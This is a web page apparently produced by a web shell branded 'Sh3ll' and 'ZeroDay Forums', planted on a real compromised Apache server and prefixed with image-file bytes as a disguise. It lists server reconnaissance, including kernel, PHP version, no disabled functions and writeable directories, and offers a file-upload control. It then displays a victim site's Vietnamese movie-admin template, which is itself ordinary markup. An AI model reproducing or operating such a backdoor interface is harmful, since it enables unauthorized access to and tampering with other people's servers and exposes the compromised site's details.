ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/thietkewebvumi.com/admin_new/skin/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/thietkewebvumi.com/admin_new/skin/admin/movie2.tpl
<h4 class="alert_info">
    <form action="index.php?act=movie2" method="post">
        <input type="text" name="kw" value="" />
        <input type="submit" name="submita" value="Search" />
    </form>
</h4>
{if $status == 'del_success'}
<h4 class="alert_success">Xóa phim thành công</h4>
{/if}
{if $status == 'add_success'}
<h4 class="alert_success">Thêm phim thành công</h4>
{/if}
{if $status == 'edit_success'}
<h4 class="alert_success">Sửa phim thành công</h4>
{/if}
{if $section == 'list'}
<script type="text/javascript">
    function get_mid(){
        if(confirm('Bạn có chắc muốn xóa?')){
            $('#form1').submit();
            return false;
        }
    }
</script>
<article class="module width_full">
    <header><h3 class="tabs_involved"><a href="javascript:void(0);" onclick="get_mid();">Xóa</a> | <a href="index.php?act=movie&code=post">Thêm mới</a></h3></header>
    <input type="checkbox" name="all" id="checkall" /> Check all


    <div class="tab_container">

        <form action="index.php" method="post" name="post" id="form1">
            <input type="hidden" name="act" value="movie">
        <div id="tab1" class="tab_content">
            <a name="phim"></a>
            <table class="tablesorter" cellspacing="0">
                <thead>
                <tr>
                    <th> </th>
                    <th>Tên phim</th>
                    <th>Hình</th>
                    <th>Mid</th>
                    <th>Cid</th>
                    <th>Type</th>
                    <th>Actions</th>
                </tr>
                </thead>

                {if $haverec == 1}
                <tbody>


                {if $a_home}
                    {foreach from=$a_home key=k item=movie}
                <tr>
                    <td><input type="checkbox" value="{$movie.id}" name="mid_for_del[]"></td>
                    <td><a href="index.php?act=movie2&code=post&id={$movie.id}" target="_blank">{$movie.title}</a></td>
                    <td><a href="index.php?act=movie2&code=post&id={$movie.id}" target="_blank"><img src="{$movie.img}" width="30" height="40" border="0"></a></td>
                    <td>{$movie.mid}</td>
                    <td>{$movie.cid}</td>
                    <td>{$movie.type}</td>
                    <td><a href="index.php?act=movie2&code=post&id={$movie.id}" target="_blank"><img src="skin/{$skin_folder_admin}/images/icn_edit.png" title="Edit"></a> <a href="index.php?act=movie2&code=del&id={$movie.id}" onclick="return confirm('Bạn có chắc muốn xóa?')"><img src="skin/{$skin_folder_admin}/images/icn_trash.png" title="Trash"></a></td>
                </tr>
                    {/foreach}
                {/if}

                </tbody>
                {/if}
            </table>
            <div class="spacer"></div>
            <div align="center">{$nav|html_entity_decode}</div>
            <div class="spacer"></div>
        </div>
        </form>

    </div><!-- end of .tab_container -->

</article><!-- end of content manager article -->
    {literal}
    <script type="text/javascript">
        $('#checkall:checkbox').change(function () {
            if($(this).attr("checked")) $('input:checkbox').attr('checked','checked');
            else $('input:checkbox').removeAttr('checked');
        });
    </script>
    {/literal}
{/if}


{if $section == 'post'}
<article class="module width_full">
    <header><h3>Quản lý phim</h3></header>
 <form name="post" id="post" action="" method="post" enctype="multipart/form-data">
    <div class="module_content">
        <fieldset>
            <label>Tên phim</label>
            <input type="text" value="{$post.title}" name="title" />
        </fieldset>
        <fieldset>
            <label>Hình phim</label>
            <input name="img" type="text" value="{$post.img}" />
        </fieldset>
        <fieldset>
            <label>Mid</label>
            <input name="mid" type="text" value="{$post.mid}" style="width:92%;"/>
        </fieldset>


        <fieldset>
            <label>Type</label>
            <select name="type" onchange="change_type(this.value); return true;">
                <option value="">-Chá»n-</option>
                <option value="phim-le" {if $post.type =='phim-le'}selected{/if}>Phim lẻ</option>
                <option value="phim-bo" {if $post.type =='phim-bo'}selected{/if}>Phim bá»™</option>
            </select>
        </fieldset>

        <fieldset>
            <label>Cid</label>
            <span id="show_cid"><input class="combobox" type="text" value="{$post.cid}" /></span>
        </fieldset>
        <fieldset>
            <label>Type2</label>
            <input name="type2" type="text" value="{$post.type2}" style="width:92%;"/>
        </fieldset>

        <div class="module_content">
            <h3>Mô tả</h3>
            <p>{$post.des|html_entity_decode}</p>
        </div>

        <fieldset>
            <label>Server 1</label>
            <textarea rows="12" name="body">{$post.body|html_entity_decode}</textarea>
        </fieldset>
        <fieldset>
            <label>Server 2</label>
            <textarea rows="12" name="body1">{$post.body1|html_entity_decode}</textarea>
        </fieldset>
        <fieldset>
            <label>Server 3</label>
            <textarea rows="12" name="body2">{$post.body2|html_entity_decode}</textarea>
        </fieldset>



        <fieldset style="width:48%; float:left; margin-right: 3%;">
            <label>ÄÆ°a TOP:</label>
            <input type="checkbox" name="top" value="1" />
        </fieldset>




    </div>
    <footer>
        <div class="submit_link">
            <input type="hidden" name="id" value="{$post.id}" />
            <input type="submit" name="bsubmit" value=" Submit " />


        </div>
    </footer>

  </form>
</article><!-- end of post new article -->
<script type="text/javascript">
    function change_type(type){
        $.ajax({
            type: 'GET',
            url: 'index.php',
            data: 'act=movie2&code=cid_type&type='+type,
            dataType: '',
            success: function(data)
            {
                $('#show_cid').html(data);
            }
        });
    }
</script>
{/if}

{if $section == 'post_epi'}
<article class="module width_full">
    <header><h3>Edit/Post tập phim</h3></header>
    <form name="post" action="" method="post" enctype="multipart/form-data">
    <div class="module_content">
        <fieldset>
            <label>eid *</label>
            <input type="text" value="{$post.eid}" name="eid" readonly />
        </fieldset>
        <fieldset>
            <label>mid *</label>
            <input type="text" value="{$post.mid}" name="mid" readonly/>
        </fieldset>
        <fieldset>
            <label>Server</label>
            <input type="text" value="{$post.server}" name="server" />
        </fieldset>

        <fieldset>
            <label>Play</label>
            <textarea name="play">{$post.play}</textarea>
        </fieldset>
        <fieldset>
            <label>Pos</label>
            <input type="text" value="{$post.pos}" name="pos" />
        </fieldset>
        <fieldset>
            <label>Site</label>
            <select name="site">
                <option value="phim19.com" {if $post.site == 'phim19.com'}selected{/if}>phim19.com</option>
                <option value="v1vn.com" {if $post.site == 'v1vn.com'}selected{/if}>v1vn.com</option>
                <option value="phim47.com" {if $post.site == 'phim47.com'}selected{/if}>phim47.com</option>
                <option value="xixam.com" {if $post.site == 'xixam.com'}selected{/if}>xixam.com</option>
                <option value="vkool.net" {if $post.site == 'vkool.net'}selected{/if}>vkool.net</option>
                <option value="okmovie.info" {if $post.site == 'okmovie.info'}selected{/if}>okmovie.info</option>
                <option value="phim4d.com" {if $post.site == 'phim4d.com'}selected{/if}>phim4d.com</option>
                <option value="phim4g.com" {if $post.site == 'phim4g.com'}selected{/if}>phim4g.com</option>
                <option value="phimvang.org" {if $post.site == 'phimvang.org'}selected{/if}>phimvang.org</option>
                <option value="phimf.com" {if $post.site == 'phimf.com'}selected{/if}>phimf.com</option>
                <option value="hayghe.com" {if $post.site == 'hayghe.com'}selected{/if}>hayghe.com</option>
                <option value="phim.clip.vn" {if $post.site == 'phim.clip.vn'}selected{/if}>phim.clip.vn</option>
                <option value="anhtrang.org" {if $post.site == 'anhtrang.org'}selected{/if}>anhtrang.org</option>
                <option value="vuaphim.net" {if $post.site == 'vuaphim.net'}selected{/if}>vuaphim.net</option>
            </select>
        </fieldset>


        <div class="clear"></div>
    </div>
    <footer>
        <div class="submit_link">
            <input type="hidden" name="id" value="{$post.id}" />
            <input type="submit" name="bsubmit" value=" Submit " />
        </div>
    </footer>
    </form>
</article><!-- end of post new article -->
{/if}

ZeroDay Forums Mini